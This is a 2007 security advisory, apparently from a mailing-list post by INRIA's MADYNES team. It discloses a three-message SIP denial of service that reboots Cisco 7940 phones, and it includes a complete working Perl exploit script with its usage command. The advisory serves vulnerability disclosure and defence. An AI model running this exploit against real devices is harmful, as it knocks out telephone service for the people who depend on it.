Hi all,
Right now, most of the DOS vulnerabilities were one message kill ones. We
would like to report a new type of vulnerabilities which are much harder to
detect, where multiple messages across one session lead to a remote DOS.
These are much more difficult to detect by simple SIP firewall/IPS ..This
one needs three messages to have the device killed.
Radu State
MADYNES Security Advisory : stateful SIP remote DOS on Cisco 7940
Date of Discovery 3 February, 2007
ID: KIPH5
Synopsis
After sending a series of three SIP messages the device reboots. The phone
does not check properly the state engine in the SIP stack
The vendor was informed in March 2007 and acknowledged the vulnerability.
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH. This is one of the first
vulnerabilities published where advanced state tracking is required.
Background
* SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP
signalization. SIP is an ASCII based INVITE message is used to initiate and
maintain a communication session.
Affected devices: Cisco phone 7940 (maybe other also) running firmware
P0S3-08-6-00
Impact :
A malicious user can remotely crash and perform a denial of service attack
by sending three crafted SIP messages.
Resolution
Fixed software will be available from the vendor and customers following
recommended best practices (ie segregating VOIP traffic from data) will be
protected from malicious traffic in most situations.
Credits
* Humberto J. Abdelnur (Ph.D Student)
* Radu State (Ph.D)
* Olivier Festor (Ph.D)
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH
Configuration of our device:
* Current Firmware : P0S3-08-6-00
* IP-Address obtained by DHCP as 192.168.1.8
* User Name: 7940-1
Vulnerability:
It is based in a sequence of messages, any of the particular messages may do
any harm by itself, but all of them turn the device in an inconsistent
state. The sequence is like:
X ------------------------- INVITE -----------------------> Cisco
X <--- 481 transaction does not exists ----- Cisco
X ------------------------- OPTIONS--------------------> Cisco
X <--------------------------- OK ------------------------- Cisco
X <--- 481 transaction does not exists ----- Cisco
X ------------------------- OPTIONS--------------------> Cisco
And the device reboots.
The INVITE sent has the particularity that the remote tag is already filled.
The following two OPTIONS messages must to have the same Call-ID as the
INVITE and the CSeq number must increment, otherwise the test does not work.
Exploit:
To run the exploit the file stateful-cisco-8.6.pl should be launched
(assuming our configurations) as:
perl stateful-cisco-8.6.pl 192.168.1.8 5060 7940-1
The script is simple and does not check if which messages are received, but
just wait a second before send the next one.
#!/usr/bin/perl
use IO::Socket::INET;
die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia:
SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom:
<sip:gasparin\@192.168.1.2>;tag=00\r\nTo:
<sip:$ARGV[2]\@$ARGV[0]>;tag=00\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 10
INVITE\r\nContent-Length: 0\r\n\r\n";;
$socket->send($msg);
sleep(1);
$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;rport;branch=01\r\nFrom:
<sip:gasparin\@192.168.1.2>;tag=01\r\nTo:
<sip:$ARGV[2]\@$ARGV[0]>\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 11
OPTIONS\r\nContent-Length: 0\r\n\r\n";
$socket->send($msg);
sleep(1);
$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;rport;branch=02\r\nFrom:
<sip:gasparin\@192.168.1.2>;tag=02\r\nTo:
<sip:$ARGV[2]\@$ARGV[0]>\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 12
OPTIONS\r\nContent-Length: 0\r\n\r\n";
$socket->send($msg);